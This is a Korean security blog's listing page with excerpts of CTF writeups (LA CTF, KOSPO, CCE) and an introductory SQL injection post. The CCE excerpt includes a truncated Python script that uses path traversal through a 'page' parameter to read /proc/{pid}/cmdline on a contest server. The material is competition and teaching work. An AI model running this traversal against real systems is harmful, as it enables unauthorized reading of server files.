일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- MySQL
- SQL Injection
- ubuntu
- lordofsqlinjection
- XSS
- 시스템
- rubiya
- 웹해킹
- CCE
- 알고리즘
- Writeup
- SQL
- webhacking.kr
- Linux
- SQLInjection
- hacking
- 해킹
- WebHacking
- webhackingkr
- 운영체제
- web
- sqli
- CODEGATE
- ctf
- Los
- crosssitescripting
- 시스템프로그래밍
- 상호배제
- 프로세스
- Python
- Today
- Total
목록web (5)
One_Blog
wightup is provided in both English and Korean. 원래 일요일엔 아무것도 안하고 쉬는데, 뭔가 너무 심심해서 CTF를 해보기로 했다. 마침 LA CTF가 열리고 있길래 풀어보게 되었다. 근데 문제 풀면서 든 생각인데, 진짜 각 잡고 풀었으면 뭔가 웹 올솔브..까진 아니어도 한 9솔브?는 했을 거 같다. 처음에 집에 와서 문제 잡고 5분만에 한 문제 풀고, (물론 700+ 솔브 문제였다..) 나머지 4문제를 2시간만에 풀었기 때문이다. 해외 CTF는 올해부터 본격적으로 해보기 시작했는데, 생각보다 재미있는 것 같다 ㅎㅎ 암튼간에 서론은 여기까지 하고, 이제 라이트업을 작성해보도록 하겠다. 2024 LA CTF Web All writeup There may be typos..
문제 .. 를 보고 직접 분석도 하고, 스샷도 찍고 할려고 했는데 .. 문제 인스턴스가 대회 끝나고 다 내려가 버렸다. 어쩔 수 없이 기억에 의존할 수 밖에 없다 ㅠㅠ 우선 KOSPO 대회의 경우, 이번엔 오전 10시부터 오후 18시까지 대회가 진행 되었다. 시간도 CCE마냥 엄청 조금 주는데, 심지어 라이트업까지 쓰게 시켰다.. 처음엔 엄청 시간이 촉박하다 라고 생각했는데, 풀면서 문제 난이도를 보니, 이렇게 시킬만 하다고 생각되었다. Rev, Pwn 등의 난이도는 안풀어봐서 잘 모르겠지만, Web은 일단 무난하게 쉬운 편이었다. 그럼에도 웹 하나를 못풀었는데 ... 그 이유는 나중에 설명하겠다. KOSPO의 경우, Web, Pwn, Rev, For와 같이 굉장히 다양한 분야의 문제가 출제되었는데, 특..
CCE.. 예선이 5월인가 그랬는데 중간에 행사가 너무 많아서 이제야 올리게됐다. 사이트도 다 닫히고 이미 할 게 없는 수준이지만 그냥 심심해서 올려본다. import sys,threading, requests URL = f'http://20.196.197.149:8000/' cpus = 0 pid_max = 4194304 nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'page': f'../../../../../../proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx worker found: {pid}') nginx_..
오늘은 정말 간단하게 SQL Injection 취약점에 대해서 알아보도록 하겠다. 웹애플리케이션의 대부분의 취약점은 사용자의 입력으로부터 발생한다. 그리고 웹 애플리케이션의 대부분은 입력란에 입력을 하는 사용자가 신뢰할 수 없는 사용자던, 신뢰할 수 있는 사용자던 상관없이 입력을 받아들인다. 물론 입력값을 받아들이는 과정에서 대부분 필터링을 거치지만, 입력 자체는 자유롭게 할 수 있기에, SQL Injection이라는 고전 취약점이 아직도 활개를 칠 수 있다. SQL Injection? 말 그대로 , SQL 삽입 취약점이다. 예를들어, 웹 페이지에서 사용자의 입력을 SELECT * FROM members WHERE id='사용자 입력' and pass ='사용자 입력'; 과 같은 식으로 받아들인다고 가정..